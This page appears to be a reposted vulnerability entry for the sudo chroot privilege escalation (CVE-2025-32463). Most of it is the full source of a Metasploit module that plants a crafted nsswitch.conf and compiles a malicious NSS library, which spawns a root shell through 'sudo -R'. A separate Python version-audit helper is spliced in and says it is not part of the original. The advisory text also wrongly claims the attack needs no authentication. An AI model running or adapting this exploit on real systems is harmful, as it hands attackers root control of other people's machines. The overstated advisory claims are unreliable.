Sudo Chroot 1917 Privilege Escalation

Vulnerability information

Vulnerability name: Sudo Chroot 1.9.17 Privilege Escalation

Vulnerability identifiers:

  • CVE: CVE-2025-32463

Vulnerability type: privilege escalation

Severity: high

Vulnerability description: This vulnerability affects Sudo, a program widely used on Linux and Unix-like systems that lets users run programs with the security privileges of another user (usually the superuser). Typical Sudo deployments include enterprise servers, personal computers, and any system that needs privilege separation; because it is so widely used, the impact of this vulnerability is broad. The vulnerability is a privilege escalation whose technical root cause is a defect in how Sudo handles chroot environments, allowing an attacker to bypass the intended privilege restrictions. Specifically, the vulnerability exists in Sudo versions 1.9.14 through 1.9.17; an attacker can exploit it without authentication by constructing a specific sequence of commands to escalate from an ordinary user to root. Exploitation may allow an attacker to take full control of the system, execute arbitrary code, access sensitive data, or carry out other malicious activity. Because exploitation requires no user interaction and can be automated, the security risk is rated high.

Product name: Sudo

Affected versions: 1.9.14 <= version <= 1.9.17

Source: https://github.com/rapid7/metasploit-framework/blob/f6bc975d24412208f3f69237edc0b15efb645e4d/modules%2Fexploits%2Flinux%2Flocal%2Fsudo_chroot_cve_2025_32463.rb

Type: rapid7/metasploit-framework: GitHub issues

PoC details


##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = NormalRanking

  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
  include Msf::Post::Linux::Compile
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Sudo Chroot 1.9.17 Privilege Escalation',
        'Description' => %q{
          This exploit module illustrates how a vulnerability could be exploited
          in a Linux command for priv esc.
        },
        'License' => MSF_LICENSE,

        'Author' => [
          'msutovsky-r7', # module dev
          'Stratascale', # poc dev
          'Rich Mirch' # security research
        ],
        'Platform' => [ 'linux' ],

        'Arch' => [ ARCH_CMD ],

        # chmod has some issues for meterpreter, forcing shell
        'SessionTypes' => [ 'shell' ],

        'Targets' => [[ 'Auto', {} ]],

        'Privileged' => true,

        'References' => [
          [ 'EDB', '52352' ],
          [ 'URL', 'https://www.helpnetsecurity.com/2025/07/01/sudo-local-privilege-escalation-vulnerabilities-fixed-cve-2025-32462-cve-2025-32463/'],
          [ 'CVE', '2025-32463']
        ],
        'DisclosureDate' => '2025-06-30',

        'DefaultTarget' => 0,

        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
        }
      )
    )

    # force exploit is used to bypass the check command results
    register_advanced_options [
      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),

    ]
  end

  # borrowed from exploits/linux/local/sudo_baron_samedit.rb
  def get_versions
    versions = {}
    output = cmd_exec('sudo --version')
    if output
      version = output.split("\n").first.split(' ').last
      versions[:sudo] = version if version =~ /^\d/
    end
    versions
  end

  def check
    sudo_version = get_versions[:sudo]

    return CheckCode::Unknown('Could not identify the version of sudo.') if sudo_version.nil?

    return CheckCode::Safe if !file?('/etc/nsswitch.conf')

    # turn a patch level such as 1.9.15p5 into 1.9.15.5 so Rex::Version can compare it
    sudo_version.gsub!(/p/, '.')

    return CheckCode::Appears("Running version #{sudo_version}") if Rex::Version.new(sudo_version).between?(Rex::Version.new('1.9.14'), Rex::Version.new('1.9.17'))

    CheckCode::Safe('Sudo is not vulnerable')
  end

  def exploit
    # Check if we're already root
    if !datastore['ForceExploit'] && is_root?
      fail_with Failure::None, 'Session already has root privileges. Set ForceExploit to override'
    end

    # needs to compile in real-time to adjust payload execution path
    fail_with Failure::NotFound, 'Module needs to compile payload on target machine' unless live_compile?

    payload_file = rand_text_alphanumeric(5..10)

    upload_and_chmodx("#{datastore['WritableDir']}/#{payload_file}", "#!/bin/bash\n" + payload.encoded)

    register_files_for_cleanup("#{datastore['WritableDir']}/#{payload_file}")

    temp_dir = "#{datastore['WritableDir']}/#{rand_text_alphanumeric(5..10)}"

    base_dir = rand_text_alphanumeric(5..10)

    lib_filename = rand_text_alphanumeric(5..10)

    mkdir(temp_dir)

    cd(temp_dir)

    cmd_exec("mkdir -p #{base_dir}/etc libnss_")

    cmd_exec(%(echo "passwd: /#{lib_filename}" \> #{base_dir}/etc/nsswitch.conf))

    cmd_exec("cp /etc/group #{base_dir}/etc")

    exploit_code = %<
      #include <stdlib.h>
      #include <unistd.h>

      __attribute__((constructor))
      void exploit(void) {
        setreuid(0,0);
        setregid(0,0);
        chdir("/");
        execve("#{datastore['WritableDir']}/#{payload_file}",NULL,NULL); /* root shell */
      }>

    upload_and_compile("#{temp_dir}/libnss_/#{lib_filename}.so.2", exploit_code, "-shared -fPIC -Wl,-init,#{base_dir}")

    cmd_exec("sudo -R #{base_dir} #{base_dir}")

    timeout = 30
    print_status 'Launching exploit...'
    output = cmd_exec 'command', nil, timeout
    output.each_line { |line| vprint_status line.chomp }
  end
end
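As an added, defender-side companion to the module's check method (this is not part of the original module or page): a standalone Python audit helper that parses `sudo --version` output, folds the `p` patch level into the comparison the way the module's `gsub(/p/, '.')` does, and reports whether a host sits in the affected 1.9.14 to 1.9.17 window while keeping the module's /etc/nsswitch.conf precondition. The sample outputs in the comments are constructed.

```python
"""Audit helper for the CVE-2025-32463 sudo version window (added example)."""
import os
import re
import subprocess
from typing import Optional, Tuple

Version = Tuple[int, int, int, int]

# Window from the advisory: 1.9.14 <= version <= 1.9.17. The fixed release carries a
# patch level (1.9.17p1), so the patch level must take part in the comparison.
VULN_FIRST: Version = (1, 9, 14, 0)
VULN_LAST: Version = (1, 9, 17, 0)


def parse_sudo_version(output: str) -> Optional[Version]:
    """Pull the version out of `sudo --version` output.

    Only the first line is consulted, as the module does, and an optional 'pN'
    suffix becomes a fourth numeric component (constructed sample:
    "Sudo version 1.9.15p5" -> (1, 9, 15, 5)), matching the module's gsub trick.
    """
    lines = output.splitlines()
    if not lines:
        return None
    match = re.search(r"\b(\d+)\.(\d+)\.(\d+)(?:p(\d+))?\b", lines[0])
    if match is None:
        return None
    major, minor, patch, plevel = match.groups()
    return (int(major), int(minor), int(patch), int(plevel or 0))


def is_affected(version: Version, nsswitch_present: bool = True) -> bool:
    """True when the version is inside the window and /etc/nsswitch.conf exists.

    The module's check returns Safe when /etc/nsswitch.conf is absent; the same
    precondition is applied here so the two agree on the same host.
    """
    if not nsswitch_present:
        return False
    return VULN_FIRST <= version <= VULN_LAST


def audit_local_host() -> Tuple[Optional[Version], bool]:
    """Run `sudo --version` on this host and return (version, affected)."""
    try:
        out = subprocess.run(["sudo", "--version"], capture_output=True, text=True).stdout
    except FileNotFoundError:  # sudo not installed: nothing to assess
        return None, False
    version = parse_sudo_version(out)
    if version is None:
        return None, False
    return version, is_affected(version, os.path.exists("/etc/nsswitch.conf"))


if __name__ == "__main__":
    print("sudo version / affected:", audit_local_host())
```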

http://example.com/2025/07/10/github_2029770819/
Author
lianccc
Published
July 10, 2025